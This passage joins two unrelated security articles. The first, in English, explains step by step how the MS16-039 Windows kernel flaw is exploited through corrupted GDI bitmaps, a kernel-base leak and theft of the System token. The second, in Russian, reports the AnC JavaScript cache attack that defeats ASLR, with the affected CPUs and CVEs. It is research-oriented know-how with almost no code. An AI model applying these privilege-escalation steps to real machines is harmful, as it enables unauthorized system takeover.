
As an example, we could create a GDI object like this:

CreateBitmap (100, 100, 1, 32, lpvBits);

Once the object has been created, if we call «GetBitmapBits» with a size bigger than 100 x 100 x 4 bytes (32 bits) it will fail, except if this object has been overwritten afterwards.

So, the way to detect which GDI object has been modified is to check when its behavior is different than expected.

Exploitation — Step 2

Now we can read/write beyond the GDI object limits, we could use this new skill to overwrite a second GDI object, and thus, to get an arbitrary write.

Looking at our heap spray, we can see that there is a second GDI object located 0x1000 bytes after from the first one.

ms16-039-gdi-secuence

So, if from the first GDI object, we are able to write the contiguous memory that we want, it means that we can modify the «SURFOBJ64.pvScan0» property of the second one.

Then, if we use the second GDI object by calling «GetBitmapBits/SetBitmapBits», we are able to read/write where we want to because we control exactly which address will be used.

Thus, if we repeat the above steps, we are able to read/write ‘n’ times any kernel memory address from USER SPACE, and at the same time, we will avoid running ring-0 shellcode in kernel space.

It’s important to say that before overwriting the «SURFOBJ64.pvScan0» property of the second GDI object, we have to read all DATA between both GDI objects, and then overwrite the same data up to the property we want to modify.

On the other hand, it’s pretty simple to detect which is the second GDI object, because when we read DATA between both objects, we are getting a lot of information, including its HANDLE.

Summing up, we use the heap overflow to overwrite a GDI object, and from this object to overwrite a second GDI object next to it.

Exploitation — Final Stage

Once we get a kernel read/write primitive, we could say that the last step is pretty simple.

The idea is to steal the «System» process token and set it to our process (exploit.exe).

As this attack is done from «Low Integrity Level», we have to know that it’s not possible to get TOKEN addresses by calling «NtQuerySystemInformation» («SystemInformationClass = SystemModuleInformation»), so, we have to take the long way.

The EPROCESS list is a linked list, where every element is a EPROCESS struct that contains information about a unique running process, including its TOKEN.

This list is pointed by the «PsInitialSystemProcess» symbol, located in «ntoskrnl.exe».
So, if we get the Windows kernel base, we could get the «PsInitialSystemProcess» kernel address, and then to do the famous TOKEN KIDNAPPING.

The best way I know of leaking a Windows kernel address is by using the «sidt» user-mode instruction.
This instruction returns the size and address of the operating system interrupt list located in kernel space.

Every single entry contains a pointer to its interrupt handler located in «ntoskrnl.exe».
So, if we use the primitive we got previously, we are able to read these entries and get one «ntoskrnl.exe» interrupt handler address.

The next step is to read backwards several «ntoskrnl.exe» memory addresses until you find the well known «MZ», which means it’s the base address of «ntoskrnl.exe».

Once we get the Windows kernel base, we only need to know what the «PsInitialSystemProcess» kernel address is.
Fortunately, from USER SPACE it’s possible to use the «LoadLibrary» function to load «ntoskrnl.exe» and then to use «GetProcAddress» to get the «PsInitialSystemProcess» relative offset.

As a result of what I explained before, I obtained this:

ms16-039-exploitation

Final notes

It’s important to say that it wasn’t necessary to use the GDI objects memory leak explained by the «Abusing GDI for ring0 exploit primitives» blogpost.

However, it’s interesting to see how «Windows 10» 64 bits can be exploited from «Low Integrity Level» through kernel vulnerabilities, despite all kernel exploit mitigations implemented until now.

Derandomization of ASLR on any modern processors using JavaScript

 


Запись обращений к кэшу устройством управления памятью (MMU) в процессоре по мере вызова страниц по особому паттерну, разработанному для выявления различий между разными уровнями иерархии таблиц. Например, паттерн «лесенки» (слева) указывает на первый уровень иерархии, то есть PTL1, при вызове страниц по 32K. Для других уровней иерархии тоже есть методы выявленияПятеро исследователей из Амстердамского свободного университета (Нидерланды) доказали фундаментальную уязвимость техники защиты памяти ASLR на современных процессорах. Они выложили исходный код и подробное описание атаки AnC (ASLR⊕Cache), которой подвержены практически все процессоры.

Исследователи проверили AnC на 22 процессорах разных архитектур — и не нашли ни одного, который был бы защищён от такого рода атаки по стороннему каналу. Это и понятно, ведь во всех процессорах используется буфер динамической трансляции для кэширования адресов памяти, которые транслируются в виртуальные адреса. Защититься от этой атаки можно только отключив кэш процессора.

Рандомизация размещения адресного пространства (ASLR) — технология, применяемая в операционных системах, при использовании которой случайным образом изменяется расположение в адресном пространстве процесса важных структур данных, а именно образов исполняемого файла, подгружаемых библиотек, кучи и стека. Технология создана для усложнения эксплуатации нескольких типов уязвимостей. Предполагается, что она должна защищать память от эксплойтов с переполнением буфера — якобы ASLR не даст злоумышленнику узнать, по какому конкретно адресу размещаются структуры данных после переполнения, куда можно записать шелл-код.

В прошлом исследователи несколько раз показывали, что защиту ASLR можно обойти в некоторых случаях. Например, если у злоумышленника есть полные права в системе, он может сломать ASLR на уровне ядра ОС. Но в типичных условиях — против атаки через браузер — ASLR считалась вполне надёжной защитой. Теперь нет.

В 2016 году эта же группа голландских специалистов показала, как с помощью JavaScript обойти защиту ASLR в браузере Microsoft Edge, используя атаку по стороннему каналу дедупликации памяти. Microsoft быстро отключила дедубликацию памяти, чтобы защитить своих пользователей. Но это не решило проблему ASLR на фундаментальном уровне, связанную с работой самого устройства управления памятью (MMU) в процессорах.

В современных процессорах модуль MMU использует иерархию кэша для улучшения производительности прохода по иерархическим таблицам страниц в памяти. Это неотъемлемая функция современных процессоров. Корень проблемы в том, что кэш L3 доступен для любых сторонних приложений, в том числе скриптов JavaScript из браузера.


Организация памяти в современном процессоре Intel

Хакеры сумели определить средствами JavaScript, к каким страницам в таблицах страниц чаще всего обращается модуль MMU. Точность определения вполне достаточна для обхода ASLR даже с энтропией 36 бит.

Принцип атаки

Принцип атаки ASLR⊕Cache основан на том, что в результате прохода MMU по таблицам страниц происходит их запись в кэш процессора. Эта операция осуществляется и во время трансляции виртуального адреса в соответствующий ему физический адрес в памяти. Таким образом, буфер динамической трансляции (TLB) в каждом процессоре всегда хранит самые последние трансляции адресов.

Если происходит промах мимо кэша TLB, то модулю MMU придётся пройти по всем таблицам страниц конкретного процесса (тоже хранящимся в основной памяти), чтобы выполнить трансляцию. Для улучшения производительности MMU в такой ситуации таблицы страниц кэшируются в быстром кэше процессора L3 для ускорения доступа к ним.

Получается, что при использовании механизма безопасности ASLR сами таблицы страниц становятся хранителем секретной информации: начальный номер записи таблицы страниц (через offset) на каждом уровне содержит часть секретного виртуального адреса, который использовался при трансляции.


Проход MMU по таблице страниц для трансляции адреса 0x644b321f4000 в соответствующую страницу памяти на архитектуре x86_64

Хакеры разработали специальную технику сканирования памяти (им нужны были таймеры получше, чем есть в браузерах), чтобы определить наборы кэша (конкретные строки в секторированном кэше прямого отображения), к которым обращается MMU после таргетированного прохода по таблицам страниц, когда происходит разыменование указателя данных или исполнение инструкции кода. Поскольку только определённые адреса могут соответствовать определённым наборам кэша, то получение информации об этих наборах выдаёт начальные номера записей нужных записей таблиц страниц на каждом уровне иерархии — и, таким образом, дерандомизирует ASLR.

Исследователи протестировали эксплойт в Chrome и Firefox на 22-ти современных процессорах и показали его успешную работу.


Успешность атаки в Chrome и Firefox и процент ложных срабатываний

Не спасают даже встроенные механизмы защиты вроде умышленной поломки разработчиками браузеров точного JavaScript-таймера performance.now().


Сломанный таймер performance.now() в Chrome и Firefox

Авторы эксплойта написали собственный таймер.

Демонстрация атаки в Firefox

Атака проверена на следующих процессорах:

Модель процессора Микроархитектура Год
Intel Xeon E3-1240 v5 Skylake 2015
Intel Core i7-6700K Skylake 2015
Intel Celeron N2840 Silvermont 2014
Intel Xeon E5-2658 v2 Ivy Bridge EP 2013
Intel Atom C2750 Silvermont 2013
Intel Core i7-4500U Haswell 2013
Intel Core i7-3632QM Ivy Bridge 2012
Intel Core i7-2620QM Sandy Bridge 2011
Intel Core i5 M480 Westmere 2010
Intel Core i7 920 Nehalem 2008
AMD FX-8350 8-Core Piledriver 2012
AMD FX-8320 8-Core Piledriver 2012
AMD FX-8120 8-Core Bulldozer 2011
AMD Athlon II 640 X4 K10 2010
AMD E-350 Bobcat 2010
AMD Phenom 9550 4-Core K10 2008
Allwinner A64 ARM Cortex A53 2016
Samsung Exynos 5800 ARM Cortex A15 2014
Samsung Exynos 5800 ARM Cortex A7 2014
Nvidia Tegra K1 CD580M-A1 ARM Cortex A15 2014
Nvidia Tegra K1 CD570M-A1 ARM Cortex A15; LPAE  2014

К сожалению, описание этой техники в открытом доступе может снова сделать эффективными старые способы атаки на кэш, от которых вроде бы уже давно защитились.

В данный момент атака AnC задокументирована в четырёх бюллетенях безопасности:

  • CVE-2017-5925 — для процессоров Intel;
  • CVE-2017-5926 — для процессоров AMD;
  • CVE-2017-5927 — для процессоров ARM;
  • CVE-2017-5928 — для JavaScript-тайеров в разных браузерах.

По мнению авторов, единственным способом защиты для пользователя является использование программ вроде NoScript, которые блокирует выполнение сторонних скриптов JavaScript в браузере.